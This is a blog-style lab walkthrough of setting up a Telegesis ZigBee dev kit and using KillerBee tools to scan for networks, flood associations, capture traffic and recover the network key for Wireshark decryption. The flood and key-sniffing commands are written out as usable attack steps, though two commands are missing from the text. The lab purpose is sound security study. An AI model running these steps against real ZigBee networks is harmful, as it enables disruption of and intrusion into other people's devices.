Awhile ago I wrote an introduction about Josh Wright’s KillerBee toolkit. I thought I’d follow up with some information on what we used to set up part of our lab and a walk through of a few of the tools. We purchased the ETRX3DVKA357 Developers Kit from Telegesis. It contains a number of ZigBee modules, a ZigBee USB adapter, three developer (dev) boards and software.
Following the instructions in the package made it simple to setup. Connect one of the ZigBee modules to a dev board then to your computer via USB. Set it to create a PAN then turn on the other dev boards and they should automatically join the PAN. The network key should be automatically generated. There are a few options in the software that will generate a new key if desired. Using the configure button in the Telegesis software will generate extra buttons which can be used control the remote dev boards. You can make the devices beep, read data from sensors and toggle power to the LEDs.
Now the fun part. Install the KillerBee API and tools on a Linux system then plug in two flashed KillerBee USB sticks and run the following command:
This will list the the device IDs. To discover the ZigBee network(s), run:
zbstumbler -i DEV1ID
The zbstumbler application will start scanning channels 11-26 for 2.4 GHz ZigBee traffic, channels 0-10 are reserved for different frequencies. Once the CHANNEL and PANID are known, we can perform the packet capture and the association flood. Start the packet capture:
zbdump -i DEV1ID -f CHANNEL -w output.pcap
While the zbdump utility is running, you can either try to turn a device off then turn it back on and see if the key was exchanged or start the association flood:
zbassocflood -i DEV2ID -p PANID -c CHANNEL
After approximately 15 seconds you can stop the association flood and stop the zbdump utility. Check the packet dump for the network key:
If the key was found in the packet capture it will display on the screen. Open Wireshark then open the Edit->Preferences->Protocols->ZigBee NWK panel. Insert the key discovered with zbdsniff into the Network Key field. By default the Security Level is set to AES-128 Encryption, 32-bit Integrity Protection, this should be correct. Use the Telegesis software and send commands to initiate tones or toggle the status of the LEDs while capturing the ZigBee traffic using zbdsniff. Load the new pcap into Wireshark and you can analyze the decrypted data. Enjoy.